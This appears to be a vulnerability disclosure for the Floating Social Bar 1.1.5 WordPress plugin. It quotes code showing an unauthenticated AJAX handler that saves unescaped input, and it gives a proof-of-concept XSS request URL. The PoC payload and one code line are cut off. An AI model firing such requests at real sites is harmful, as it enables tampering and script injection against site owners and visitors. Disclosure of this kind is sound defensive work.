Everyone can access save_order(). File: floating-social-bar\class-floating-social-bar.php ``` add_action( 'wp_ajax_fsb_save_order', array( $this, 'save_order' ) ); add_action( 'wp_ajax_nopriv_fsb_save_order', array( $this, 'save_order' ) ); $_REQUEST['items'] is not escaped. ``` File: floating-social-bar\class-floating-social-bar.php ``` public function save_order() { // Prepare variables. $items = stripslashes_deep( $_REQUEST['items'] ); $option = get_option( 'fsb_global_option' ); $update = array(); // Loop through options, and if the service is not in the array of items, set it to off (the order doesn't matter). foreach ( $option['services'] as $service => $data ) if ( ! in_array( $service, $items ) ) $update['services'][$service]['on'] = false; // Now loop through the selected items and set them to on and save the order. foreach ( $items as $i => $item ) { $update['services'][$item]['on'] = true; $update['services'][$item]['order'] = $i; } // Update our option. update_option( 'fsb_global_option', array_merge( $option, $update ) ); // Send back a response and die. echo json_encode( $update ); die; } $this->option = get_option( 'fsb_global_option' ) ? get_option( 'fsb_global_option' ) : $this->default_options(); option['services'] as $service => $data ) : ?>

``` Proof of Concept: ``` http://wordpress-url/wp-admin/admin-ajax.php?action=fsb_save_order&items[1]="> ```

Floating Social Bar 1.1.5 XSS